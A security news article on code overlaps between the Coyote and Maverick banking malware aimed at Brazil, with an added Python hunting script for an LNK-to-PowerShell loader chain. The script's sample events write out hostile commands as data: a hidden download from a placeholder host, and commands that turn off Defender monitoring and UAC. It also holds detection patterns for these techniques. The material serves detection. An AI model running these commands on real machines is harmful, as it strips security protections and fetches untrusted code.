Cybersecurity analysts have uncovered close ties between two distinct banking malware families, Coyote and Maverick. According to a report by CyberProof, both malicious programs are written in .NET, focus on users and financial institutions in Brazil, and share key features. Specifically, they use identical routines for decrypting data, matching banking URLs, and monitoring active banking applications. Crucially, both are able to self-propagate through the desktop web version of WhatsApp. This shared tooling and targeting strategy has prompted investigation into whether Maverick is a successor to, or an evolution of, the older Coyote strain.
The campaign associated with Maverick, which Trend Micro first documented and attributed to the actor "Water Saci", involves a two-stage attack. The initial component, dubbed SORVEPOTEL, is a self-propagating piece of malware that spreads via WhatsApp Web and delivers a ZIP archive containing the final Maverick payload. Once executed, the malware monitors the victim's open browser tabs, continuously comparing their URLs against a hard-coded list of Latin American financial institutions. If a match is found, it connects to a remote command-and-control (C2) server to download and execute further commands, which are used to gather system data and serve convincing phishing pages designed to steal the user's banking credentials.
The question of a relationship between the two strains has been a subject of debate among security researchers. Sophos was the first to publicly suggest a possible link, proposing that Maverick might be an evolution of Coyote because of the significant overlaps in targeting and mechanism. A subsequent analysis by Kaspersky confirmed that Maverick shares numerous code overlaps with Coyote, but the firm chose to treat it as a new and distinct threat targeting Brazil at scale. The latest findings from CyberProof add further evidence to the theory that Maverick is a direct successor to, or a heavily modified version of, its predecessor.
CyberProof's technical analysis detailed the initial compromise path: the ZIP archive contains a Windows shortcut (LNK) file that, when opened, launches a cmd.exe or PowerShell script. This script connects to an external server to fetch the first-stage payload, a PowerShell script that launches tools capable of disabling key security features such as Microsoft Defender Antivirus and User Account Control (UAC) before retrieving a final .NET loader. The loader includes anti-analysis checks that cause it to terminate if reverse-engineering tools are detected. Only after these checks pass, and after the loader verifies that the victim is located in Brazil (via time zone, language, and regional settings), are the main modules, SORVEPOTEL and Maverick, deployed. CyberProof also noted an expansion of targeting, finding evidence that the malware is being deployed against hotels within Brazil.
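The chain described above (LNK opened from Explorer, a shell that downloads a stage, then Defender or UAC tampering) leaves a recognisable trail in process-creation telemetry. The following is an added example written for this page, not code from CyberProof, Trend Micro, Sophos or Kaspersky, and it does not use any indicator from their reports: it runs a small set of generic hunting rules over constructed, pipe-delimited process events (ParentImage|Image|CommandLine). The download and tampering primitives it looks for (Invoke-WebRequest, DownloadString, Set-MpPreference, EnableLUA and so on) are ordinary Windows commands chosen here as assumptions about what such a loader might run, not the commands the reports attribute to Water Saci.

```python
"""Toy process-event triage for an LNK -> shell -> download -> defence-tampering chain.

Added example for illustration only. The event format, sample lines and indicator
lists are this example's own assumptions, not artefacts from the reports discussed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent image path, lower-cased
    image: str     # image path, lower-cased
    cmdline: str   # original command line


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Download primitives frequently abused by first-stage loaders (assumed list).
DOWNLOAD_PATTERNS = [
    r"invoke-webrequest", r"\biwr\b", r"downloadstring", r"downloadfile",
    r"start-bitstransfer", r"\bcurl\b", r"\bcertutil\b.*-urlcache", r"\bbitsadmin\b",
]

# Defender / UAC tampering primitives (generic Windows commands, assumed list).
TAMPER_PATTERNS = [
    r"set-mppreference.*-disablerealtimemonitoring",
    r"set-mppreference.*-exclusionpath",
    r"enablelua.*\b0\b",
    r"consentpromptbehavioradmin",
]


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'ParentImage|Image|CommandLine' record."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip().lower(), image.strip().lower(), cmdline.strip())


def classify(ev: ProcEvent) -> list:
    """Return the rule tags that fire for a single event (empty list if none)."""
    tags = []
    base = ev.image.rsplit("\\", 1)[-1]
    cl = ev.cmdline.lower()
    is_shell = base in SHELLS

    # Rule 1: a shell spawned by Explorer (a double-clicked LNK looks like this)
    # whose command line fetches remote content.
    if is_shell and ev.parent.endswith("explorer.exe") \
            and any(re.search(p, cl) for p in DOWNLOAD_PATTERNS):
        tags.append("lnk-style-download")

    # Rule 2: any process that turns off Defender real-time protection,
    # adds exclusions, or disables UAC via the registry.
    if any(re.search(p, cl) for p in TAMPER_PATTERNS):
        tags.append("defence-tampering")

    # Rule 3: PowerShell invoked with an encoded command (-e / -ec / -enc / -encodedcommand).
    if is_shell and re.search(r"(^|\s)-e(c|nc|ncodedcommand)?\s", cl):
        tags.append("encoded-command")
    return tags


def scan(lines) -> dict:
    """Map the index of each suspicious event to the list of tags that fired."""
    findings = {}
    for idx, line in enumerate(lines):
        tags = classify(parse_event(line))
        if tags:
            findings[idx] = tags
    return findings


# Constructed sample telemetry (not real logs); example.invalid is a reserved test domain.
SAMPLE_EVENTS = [
    r'C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c powershell -w hidden -c "iwr http://example.invalid/s1 -OutFile %TEMP%\s1.ps1"',
    r'C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -ExecutionPolicy Bypass -File C:\Users\u\AppData\Local\Temp\s1.ps1',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\reg.exe|reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -NoProfile Get-ChildItem C:\Users',
]


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(tags)}")
```

Note that the last sample event, an Explorer-spawned PowerShell that merely lists a directory, produces no finding: rule 1 requires both the Explorer parent and a download primitive, which keeps the rule from firing on every shortcut a user opens. In production the same logic would run over Sysmon Event ID 1 or EDR process-creation records rather than constructed strings.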
These findings coincide with a separate report from Trend Micro detailing a new attack chain employed by Water Saci. This new campaign uses email-based C2 infrastructure, incorporates multi-vector persistence for resilience, and adds checks that restrict execution to systems running in Portuguese, reducing its exposure to analysts outside the target region. According to the company, the updated attack features a remote management system that gives the threat actors real-time control to pause, resume, and monitor the campaign, effectively turning compromised machines into a botnet that can be coordinated across multiple endpoints.